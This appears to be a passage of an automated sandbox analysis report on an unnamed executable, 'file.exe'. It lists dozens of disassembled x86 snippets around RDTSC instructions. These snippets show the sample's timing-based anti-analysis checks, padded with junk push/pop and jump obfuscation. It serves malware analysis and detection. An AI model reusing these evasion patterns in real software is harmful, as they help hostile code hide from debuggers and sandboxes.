Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE74BD second address: ACCE28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jnc 00007F6204BE6478h 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop edx 0x00000012 popad 0x00000013 nop 0x00000014 and cx, 44AFh 0x00000019 lea eax, dword ptr [ebp+1248ACB7h] 0x0000001f mov cl, ah 0x00000021 push eax 0x00000022 jmp 00007F6204BE6486h 0x00000027 mov dword ptr [esp], eax 0x0000002a push 00000000h 0x0000002c push ebp 0x0000002d call 00007F6204BE6478h 0x00000032 pop ebp 0x00000033 mov dword ptr [esp+04h], ebp 0x00000037 add dword ptr [esp+04h], 0000001Ch 0x0000003f inc ebp 0x00000040 push ebp 0x00000041 ret 0x00000042 pop ebp 0x00000043 ret 0x00000044 sub edi, 0C31705Eh 0x0000004a jne 00007F6204BE647Ch 0x00000050 call dword ptr [ebp+122D31B0h] 0x00000056 jl 00007F6204BE647Ah 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007F6204BE647Fh 0x00000063 jmp 00007F6204BE6487h 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2FB2E second address: B2FB68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F620450A757h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F620450A746h 0x00000014 jmp 00007F620450A754h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2FB68 second address: B2FB6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2FCF1 second address: B2FD08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F620450A750h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2FD08 second address: B2FD21 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6204BE6478h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2FD21 second address: B2FD2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F620450A74Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2FD2F second address: B2FD3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jp 00007F6204BE6476h 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B302D8 second address: B302DF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B302DF second address: B3032C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 jmp 00007F6204BE647Fh 0x0000000b jng 00007F6204BE6476h 0x00000011 pop esi 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jmp 00007F6204BE6486h 0x0000001c pushad 0x0000001d popad 0x0000001e jmp 00007F6204BE647Bh 0x00000023 popad 0x00000024 js 00007F6204BE647Ch 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3032C second address: B30330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B30330 second address: B30336 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B30336 second address: B3033C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3033C second address: B30340 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B33889 second address: B338A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F620450A753h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B338A4 second address: B338B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F6204BE6476h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B338B3 second address: B338C2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F620450A746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAB919 second address: AAB923 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F6204BE6476h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B335D2 second address: B335D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B335D6 second address: B335E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F6204BE6476h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B335E5 second address: B33606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007F620450A746h 0x0000000c jmp 00007F620450A750h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B33606 second address: B3360C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3360C second address: B33610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B35BC1 second address: B35BC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B35BC5 second address: B35BD4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F620450A74Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B35BD4 second address: B35BFE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnl 00007F6204BE6476h 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F6204BE6484h 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B35BFE second address: B35C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3C0A0 second address: B3C0A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3C0A4 second address: B3C0B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F620450A74Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3C0B2 second address: B3C0B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3C0B6 second address: B3C0C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F620450A746h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3AA46 second address: B3AA92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F6204BE6476h 0x0000000a jng 00007F6204BE6476h 0x00000010 popad 0x00000011 jno 00007F6204BE6478h 0x00000017 pushad 0x00000018 jng 00007F6204BE6476h 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 pop eax 0x00000022 popad 0x00000023 pushad 0x00000024 push ebx 0x00000025 pop ebx 0x00000026 jmp 00007F6204BE6487h 0x0000002b push eax 0x0000002c pop eax 0x0000002d popad 0x0000002e popad 0x0000002f push eax 0x00000030 push edx 0x00000031 push esi 0x00000032 push eax 0x00000033 pop eax 0x00000034 pop esi 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3AA92 second address: B3AAAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F620450A755h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3ABE1 second address: B3ABEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F6204BE6482h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE6DDD second address: AE6E4C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F620450A748h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 mov ebx, dword ptr [ebp+1248ACF6h] 0x00000029 push 00000000h 0x0000002b push edi 0x0000002c call 00007F620450A748h 0x00000031 pop edi 0x00000032 mov dword ptr [esp+04h], edi 0x00000036 add dword ptr [esp+04h], 0000001Ch 0x0000003e inc edi 0x0000003f push edi 0x00000040 ret 0x00000041 pop edi 0x00000042 ret 0x00000043 add eax, ebx 0x00000045 nop 0x00000046 pushad 0x00000047 jmp 00007F620450A74Fh 0x0000004c push eax 0x0000004d push edx 0x0000004e push ecx 0x0000004f pop ecx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE6E4C second address: AE6E50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE6E50 second address: AE6E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE6E5E second address: AE6EC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 sub dword ptr [ebp+1247499Eh], eax 0x0000000f sbb di, 9B71h 0x00000014 push 00000004h 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007F6204BE6478h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 0000001Bh 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 mov edx, dword ptr [ebp+122D2E5Eh] 0x00000036 push esi 0x00000037 and dl, 00000052h 0x0000003a pop edx 0x0000003b push eax 0x0000003c pushad 0x0000003d ja 00007F6204BE6478h 0x00000043 pushad 0x00000044 popad 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F6204BE6483h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3F17C second address: B3F190 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F620450A746h 0x00000008 jnc 00007F620450A746h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3F190 second address: B3F194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3F194 second address: B3F1AA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F620450A74Dh 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3F1AA second address: B3F1DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6204BE6489h 0x00000011 push eax 0x00000012 push edx 0x00000013 jnp 00007F6204BE6476h 0x00000019 jne 00007F6204BE6476h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3F1DD second address: B3F1E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F620450A746h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3F1E9 second address: B3F1FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6204BE647Dh 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3F4BA second address: B3F4D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop esi 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F620450A74Ch 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3F61E second address: B3F629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3F76A second address: B3F773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3F773 second address: B3F777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3F777 second address: B3F77D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B44E84 second address: B44E88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B44E88 second address: B44E92 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B446A3 second address: B446A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B44801 second address: B44807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B44807 second address: B44841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6204BE6489h 0x00000009 popad 0x0000000a push edi 0x0000000b ja 00007F6204BE6476h 0x00000011 pop edi 0x00000012 popad 0x00000013 push edx 0x00000014 jnc 00007F6204BE6478h 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e jbe 00007F6204BE6476h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4ACFE second address: B4AD02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4B08C second address: B4B09F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F6204BE6476h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4B09F second address: B4B0A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4B0A3 second address: B4B0A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4B67D second address: B4B696 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F620450A74Eh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4B9B3 second address: B4B9DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 jc 00007F6204BE6476h 0x0000000c jc 00007F6204BE6476h 0x00000012 pop eax 0x00000013 popad 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F6204BE647Eh 0x0000001c jno 00007F6204BE6476h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4BCFA second address: B4BD12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F620450A74Ch 0x00000009 pop ebx 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4C8A5 second address: B4C8B0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 ja 00007F6204BE6476h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B50812 second address: B50817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B50817 second address: B50821 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6204BE647Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4FAE4 second address: B4FAF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 jl 00007F620450A746h 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4FC15 second address: B4FC44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6204BE647Bh 0x00000009 pop edi 0x0000000a je 00007F6204BE647Ch 0x00000010 jnc 00007F6204BE6476h 0x00000016 push eax 0x00000017 push edx 0x00000018 push esi 0x00000019 pop esi 0x0000001a jmp 00007F6204BE647Fh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4FF2B second address: B4FF31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4FF31 second address: B4FF67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pushad 0x00000006 popad 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop ebx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop edi 0x00000011 ja 00007F6204BE6495h 0x00000017 jmp 00007F6204BE6489h 0x0000001c jns 00007F6204BE6476h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B503D6 second address: B503DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B503DA second address: B503E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B503E4 second address: B5040D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F620450A753h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push esi 0x0000000b pushad 0x0000000c jmp 00007F620450A74Dh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5040D second address: B5041D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F6204BE6476h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5A792 second address: B5A7B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F620450A752h 0x00000009 ja 00007F620450A746h 0x0000000f popad 0x00000010 push ecx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 pop eax 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5A7B5 second address: B5A7BA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5A7BA second address: B5A7D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F620450A74Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5A950 second address: B5A955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5AAC0 second address: B5AAFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F620450A752h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F620450A753h 0x00000010 jmp 00007F620450A751h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5AAFC second address: B5AB00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5AB00 second address: B5AB06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5AB06 second address: B5AB12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F6204BE6476h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5AB12 second address: B5AB37 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F620450A746h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F620450A755h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5ADE0 second address: B5ADEE instructions: 0x00000000 rdtsc 0x00000002 je 00007F6204BE6476h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5ADEE second address: B5AE0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F620450A750h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push ebx 0x0000000e jnl 00007F620450A746h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5AE0F second address: B5AE1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jne 00007F6204BE647Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5B0AD second address: B5B0B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5B0B3 second address: B5B0B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
